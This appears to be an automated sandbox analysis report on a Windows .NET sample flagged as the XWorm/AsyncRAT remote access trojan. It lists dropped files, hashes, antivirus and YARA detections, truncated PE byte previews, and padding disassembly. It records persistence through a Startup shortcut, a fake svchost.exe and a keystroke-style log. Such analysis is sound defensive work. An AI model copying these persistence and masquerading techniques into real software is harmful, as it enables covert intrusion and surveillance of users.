                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................

                                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):41
                                                    Entropy (8bit):3.7195394315431693
                                                    Encrypted:false
                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                    Malicious:false
                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hxnlpzr.1i5.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2y3svls3.0m2.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4slawral.yfs.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nro3grt.o0d.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afbk1okh.wjo.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsuvudhr.bfx.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfibnbc1.ngw.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpvnftfl.o5k.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhmc5txc.3bt.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfiqvsny.f5m.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoorthqx.yb4.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlr0ykn1.wgb.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqpsb1at.5sz.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t50qpaed.aks.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teyycxfy.zev.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1p3jg1u.xpq.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4156416
                                                    Entropy (8bit):7.99943056153774
                                                    Encrypted:true
                                                    SSDEEP:98304:mer3mJdJ0Gz+yQ3zkgHC3lD1qhPEeXkZGRaGxOJx1/q:jSJdJrz+yOkg8BQPfXYoI1
                                                    MD5:C442A9B9299246B2E5683641A4341641
                                                    SHA1:31F41C27CEACC503F33EA72C1AC7C077BC5D9235
                                                    SHA-256:DEDD4C249A6A78E8E2603E7BF8227BBCD1DCCA0E0F272EC204CF4A1A61DAE7D9
                                                    SHA-512:FC605ADCF43C6F4AE4B4903CF1BA43BC447DDECBBAA8E412845B0DDFEE4B36BE55E32B42B3005C7C67BB59F5F2A4C9271BAA97EB497C4998883F7E69EC8BDD36
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.(g.................b?.........>.?.. ....?...@.. ........................?...........@...................................?.W.....?.......................?...................................................... ............... ..H............text...D`?.. ...b?................. ..`.rsrc.........?......d?.............@..@.reloc........?......j?.............@..B................ .?.....H.......dW?..(......!...$&..@1?...........................................(....*.r...p*. ....*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r#..p*. ..?.*.r...p*. n3..*.rE..p*. .O..*.r...p*. Fc7.*.rg..p*. .(T.*..(&...*.r...p*. S...*.rO..p*.r...p*. S...*.r3..p*. rmB.*.r...p*. W.R.*.r...p*. ..e.*.r...p*. `...*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0......

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 2 18:10:37 2025, mtime=Thu Jan 2 18:10:38 2025, atime=Thu Jan 2 18:10:37 2025, length=69632, window=hide
                                                    Category:dropped
                                                    Size (bytes):765
                                                    Entropy (8bit):5.0873789393675795
                                                    Encrypted:false
                                                    SSDEEP:12:8frEA24CykChzQY//jt3/ELgfQatw9jAc0CUHkhzBz/mV:8frE6CAX7N/mgBtEAc0OhNDm
                                                    MD5:6790E3AE026FE7ACD9C1C4489FE2E9BA
                                                    SHA1:0B5B916AB2105462977880136DCE59B5BD0E2C5F
                                                    SHA-256:FDBC46EBEEFF7CF8FA3D24880E61A085B7EF311BF88682B65466492D5A5FEF6F
                                                    SHA-512:68FADD8F671BCA7FC8E2F56208F6EA0EA182B440780A18CE8A4F545F6E31A8803F3DF25F3E7D8943B499EFADC200005243D8E726774A63C0F07B0C51C50F292B
                                                    Malicious:false
                                                    Preview:L..................F.... .....r.J]..OMN.J]....r.J]..........................v.:..DG..Yr?.D..U..k0.&...&.......y.Yd.......I]..V.E)J]......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B"ZQ...........................d...A.p.p.D.a.t.a...B.V.1....."ZS...Roaming.@......EW)B"ZS..............................R.o.a.m.i.n.g.....b.2....."ZS. .svchost.exe.H......"ZS."ZS..............................s.v.c.h.o.s.t...e.x.e.......Z...............-.......Y...........&........C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......971342...........hT..CrF.f4... .c.LW=....,...E...hT..CrF.f4... .c.LW=....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                    C:\Users\user\AppData\Roaming\svchost.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.975187764500989
                                                    Encrypted:false
                                                    SSDEEP:1536:WT/juex6LhRZniVHnXSe8PmWbT04YzNgWIOp6yF1R9Oc7uu:WjjuIpVHnXSe2xbTWqOlz9Ocau
                                                    MD5:6D378D7AF71086710318CDDA873D9348
                                                    SHA1:3D55D27FB66361254D954060904E5EE0B6CD13C1
                                                    SHA-256:531640277D1DC2206A49F3A69D412CFECECC97251247917403A69ABF982E492B
                                                    SHA-512:696B94E8D8FBAB051C1DB635765DAE200CAAA631850950D4B39F0AB92B4968EEDB3B86888F2E9A54CBA6DB7667A5FF4087B25F97E6C999A1464E2AD7B87DE131
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag............................>%... ...@....@.. ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ %......H........b..........&.....................................................(....*.r...p*. .=l.*..(....*.r!..p*. ^...*.s.........s.........s.........s.........*.r...p*. S...*.r...p*. .s..*.rr..p*. ...*.r...p*. ..Q.*.r>..p*. ....*..((...*.rr..p*. x.`.*.r...p*. FwB.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rN..p*. .x!.*.r...p*. *p{.*.r...p*.r...p*. Q...*.r...p*.rL..p*. ....*.r...p*.r...p*.r..

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.999645683890383
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:file.exe
                                                    File size:4'238'848 bytes
                                                    MD5:838f4cdbbfc3d37d94c45da811be76a8
                                                    SHA1:822be42f201602ee3a7bb84363e1edd8dc595651
                                                    SHA256:c4d520b953525a1e9ad38ec6a8addef6584ca7e1d479bc1ddc6ef3a79a537bce
                                                    SHA512:db227c85d10865fb63afb6c8efac3aefa78ba8f2e8fb6dc7689df6406704723244beaf19b3110b0cf5f55ac125bc03ed7a4256cd25df4ea642e2101a28298ebf
                                                    SSDEEP:98304:L+wD9dYGG4m1mhxWH+ADn/Juj68DJD2lyDSaM/:6w5dUixVAD/eN1Smi
                                                    TLSH:7516336A130E2D1DFF212B726C55CF5B0EA014CA23EDDE7AE495FE085A075C680ED7A4
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.Ag..................@...........@.. ....@...@.. ....................... A...........@................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x80c2de
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6741F349 [Sat Nov 23 15:22:49 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
